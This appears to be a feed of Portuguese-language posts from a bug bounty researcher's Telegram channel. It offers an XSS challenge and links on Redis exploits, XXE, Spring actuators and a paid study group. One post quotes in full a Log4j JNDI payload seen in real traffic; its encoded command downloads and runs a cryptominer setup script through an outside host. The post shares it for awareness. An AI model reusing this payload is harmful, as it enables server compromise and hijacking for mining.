Tu manja de xss? Quero ver então!

Que comece a saga dos mini labs!

https://brunomenozzi.com/desafios/xss.php

Manda aqui nos comentários um PRINT (sem expor o payload que tu usou) c/ um alert(1337)!

Nada de self xss / alert no console do navegador ein hahah
Lá se vai o Bruno compartilhar mais uma entrevista com o James Kettle. Me aguentem. Sou fã.

https://www.youtube.com/watch?v=KxWx9zJuHO0
YouTube
HTTP/1.1 Must Die - James Kettle (PortSwigger)
In this special episode of Seemposium LowLevel, Andrea and Gabriele sit down with James Kettle (aka albinowax), Director of Research at PortSwigger, and one of the most influential minds in web security today.

From his groundbreaking talk “HTTP/1.1 must…
Fala sério, essa engenharia social foi foda (pra quem não pegou a sacada, é que o JS consegue jogar payload pro ctrl + v das pessoas. O atacante criou uma página pra simular que deu erro, inventa um motivo e faz a pessoa colar o comando no executar do windows, tendo acesso ao PC da vítima e provavelmente ganhando uma persistência)
CVE-2025-49844 (RediShell) - Proof of Concept
Use-After-Free vulnerability in Redis Lua interpreter

https://github.com/raminfp/redis_exploit

Eu dei uma conferida no source, parece autentico e sem fins maliciosos, mas sempre verifiquem e assuma o risco por sua conta
GitHub
GitHub - raminfp/redis_exploit: CVE-2025-49844 (RediShell)
GitHub - raminfp/redis_exploit: CVE-2025-49844 (RediShell)
CVE-2025-49844 (RediShell). Contribute to raminfp/redis_exploit development by creating an account on GitHub.
Alguém on aí pra eu pedir um favor de teste no site (acessar e ficar navegando)?
https://brunomenozzi.com/
Bruno Menozzi (Zeroc00I)
ei, já almoçou?! Agora clica no link para ler o conteúdo que eu tinha te falado ontem! "Como sair dos duplicados em Bugbounty?" https://brunomenozzi.com/VIP/como_sair_de_duplicados_part1/ Essa é a parte 1 da nossa saga! Espero que gere alguns insights pra…
Quando falei em Log4j nesse post, saca só uns payloads que geralmente assim que tu expõe um IP pra internet ele começa a receber (vide imagem).

Isso independe do que tu ta executando na tua VPS. No meu caso o blog foi feito com hugo + o tema geekdocs.

Como vocês são hackers, eu vou de site estático mesmo hahaha

Payload:
User Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')
Qual teu modelo de trampo?
Anonymous Poll
72%
Remoto
17%
Presencial
11%
Hibrido
Galera, coloquem em suas agendas os dias e horários pra assistir essa galera de peso! Seguem mais infos:

É com imensa felicidade que anunciamos a OFFSEC FEST, realizada pela LICS | Liga de Cibersegurança da UNICAMP.

Trata-se de um evento online e gratuito, disponível para toda a comunidade de segurança da informação brasileira, na qual reforça a principal tarefa das universidades públicas: a democratização do acesso ao conhecimento.


Palestras:

05/11 - 19h: Francisco Marinho (IT.eam) | Além do SIEM, Técnicas modernas de evasão em ambientes monitorados

11/11 - 12h: Vinicius Vieira (Trustly) | OPSEC for Red Teamers, Como ficar fora da cadeia

19/11 - 19h: Rafael Félix (Hakai) | Utilização de LLMs para facilitar a análise de Malwares

26/11 - 12h: Daniel Marques (EY) | Amplificando ataques de phishing com I.A generativa

Link de inscrição: https://forms.gle/SSkYtabVhhHMDwHCA
Google Docs
OFFSEC FEST🦅 - 1ª Edição 2025🔐
Boas-vindas, Agente! Animado para a primeira edição da LICS OFFSEC Fest? Um mês emocionante com palestras de profissionais incríveis toda semana, contatos e novas experiências. Inscreva-se e chame seus amigos para participarem juntos !😎

LICS Recebe: Grandes…
Bruno Menozzi (Zeroc00I)
Salve pessoal! Entre hoje e amanhã vou postar no nosso site uma prévia textual com o assunto: "Como sair dos duplicados em Bugbounty?" O texto na página é uma forma de não deixar vocês de fora da saga que nosso grupo VIP está tendo (Imagem que enviei agora)!…
ei, já almoçou?!
Agora clica no link para ler o conteúdo que eu tinha te falado ontem!

"Como sair dos duplicados em Bugbounty?"

https://brunomenozzi.com/VIP/como_sair_de_duplicados_part1/

Essa é a parte 1 da nossa saga! Espero que gere alguns insights pra ti.
Bruno Menozzi aka Zeroc00i
Como evito duplicados em Bugbounty?
Descubra como se destacar no Bug Bounty e evitar relatórios duplicados, explorando metodologias e ferramentas de forma inovadora.
Salve pessoal!
Entre hoje e amanhã vou postar no nosso site uma prévia textual com o assunto:

"Como sair dos duplicados em Bugbounty?"

O texto na página é uma forma de não deixar vocês de fora da saga que nosso grupo VIP está tendo (Imagem que enviei agora)!

Se tu quiser uma explicação mais detalhada desse assunto e outros, cola com a gente no grupo VIP. Mais informações no link a seguir:

https://t.me/zeroc00i_news/475
Bruno Menozzi (Zeroc00I)
Já explorou XXE? E um XXE trigando um SSRF, usando uma DTD interna do windows? Tem muitos cenários além dos payloads básicos do XXE To construindo essa página aqui para falar um pouco mais disso. Alguns highlights: - Já encontrei em bugbounty um XXE no…
Print mostrando parte do blog falando sobre XXE:
Já explorou XXE? E um XXE trigando um SSRF, usando uma DTD interna do windows?

Tem muitos cenários além dos payloads básicos do XXE

To construindo essa página aqui para falar um pouco mais disso.

Alguns highlights:

- Já encontrei em bugbounty um XXE no parâmetro SAMLResponse de uma aplicação, que por padrão já espera um formato XML.
- Parece simples, mas muitas vezes explorar um XXE sabendo a sintaxe certa de uma requisição SOAP, pode te dar uma dor de cabeça.

Leia mais em: https://brunomenozzi.com/posts/XXE/introducao/
ALERTA DE SEGURANÇA
... a maioria é falso positivo, mas essa call aqui é boa pra ti!

Galera, de tarde fiz a abertura do grupo premium que eu havia falado uns dias atrás

Resolvi, agora com mais tempo, fazer um vídeo para vocês explicando sobre essa iniciativa de abertura de um grupo premium e o que te espera!

O link para a página é esse 💪:

https://lastlink.com/p/C68E8B1EA/
Media is too big
VIEW IN TELEGRAM
Bruno Menozzi (Zeroc00I)
Seguinte! Tô abrindo um Grupo Premium para elevarmos o nível. Quem me conhece sabe: eu não paro de estudar. A frequência que eu posto aqui não é nada perto dos cenários que eu construo e percorro até acertar. Antes, eu compartilhava mini conteúdos de forma…
🔥 Pessoal, inscrições pro Grupo premium abertas! 🔥

Acesse o link a seguir e garante tua vaga já!

https://lastlink.com/p/C68E8B1EA/

Ainda hoje vou falar com vocês por lá.
Nos vemos em breve =)

SIMBORAAA

By Zeroc00i
Lastlink
Grupo Premium do Zeroc00i
🔥 1º LOTE PROMOCIONAL: GRUPO VIP INFOSEC - R$ 15,00/mês
Se você busca um espaço para aprofundar seus conhecimentos em Infosec ao lado de pessoas com os mesmos objetivos, este é o seu lugar.
Este é o nosso Grupo VIP no Telegram, um círculo fechado onde o conteúdo…
Bruno Menozzi (Zeroc00I)
dica de bash da madrugada nao usem 2>/dev/null, usem 2>&- Não faz sentido jogar o erro para o null do sistema, se voce pode simplesmente fechar o canal de erro e evitar o sistema consumir i/o (Essa aprendi com o Júlio Neves) M1:tmp brunomenozzi$ time for…
Seguindo o nosso mantra: Não basta 'soltar' o conhecimento. Para que seu handle perdure, crie o material que a galera vai consultar por anos

Levei essa dica para o nosso blog explicando sobre o motivo dessa diferença de performance e os file descriptors do linux:
https://brunomenozzi.com/posts/bash-tricks/erros-para-o-dev-null/
Bruno Menozzi aka Zeroc00i
Erros para o /dev/null?
Explore o mundo dos File Descriptors no Linux, entendendo como o kernel os gerencia e como pequenas otimizações na manipulação de I/O podem impactar drasticamente a performance de seus scripts e aplicações.
dica de bash da madrugada
nao usem 2>/dev/null, usem 2>&-

Não faz sentido jogar o erro para o null do sistema, se voce pode simplesmente fechar o canal de erro e evitar o sistema consumir i/o (Essa aprendi com o Júlio Neves)

M1:tmp brunomenozzi$ time for i in {1..1000000}; do true 2>/dev/null; done #para dev/null

real 0m12.066s
user 0m3.581s
sys 0m8.448s

M1:tmp brunomenozzi$ time for i in {1..1000000}; do true 2>&-; done #fechamos o canal de erro

real 0m2.903s
user 0m2.277s
sys 0m0.619s
Bruno Menozzi (Zeroc00I)
Esse pesquisador tem falado no twitter que tem encontrado muitos bypass de endpoints de actuators expostos em bugbounty e feito uma grana. Acabei de ver que hoje ele lançou o artigo que disse que lançaria. Enquanto espero a comida chegar vou ler junto com…
Artigo muito bom e com referencias boas, tipo a empresa Wiz, do Nagli, pra quem conhece.
Eu ja achei alguns spring em bugbounty um tempo atras e a empresa realmente pagou (achei 4 e nem tinha dado sensivel).

Hoje em dia não foco mais nesse tipo de automação, mas se tu é da metodologia de automação, tem caldo aí
Esse pesquisador tem falado no twitter que tem encontrado muitos bypass de endpoints de actuators expostos em bugbounty e feito uma grana.

Acabei de ver que hoje ele lançou o artigo que disse que lançaria.
Enquanto espero a comida chegar vou ler junto com vocês, deixando o link aqui

https://www.dsecured.com/en/articles/spring-boot-actuator-using-misconfig-to-your-advantage-paths-bypasses-techniques
Before
After
Back to Top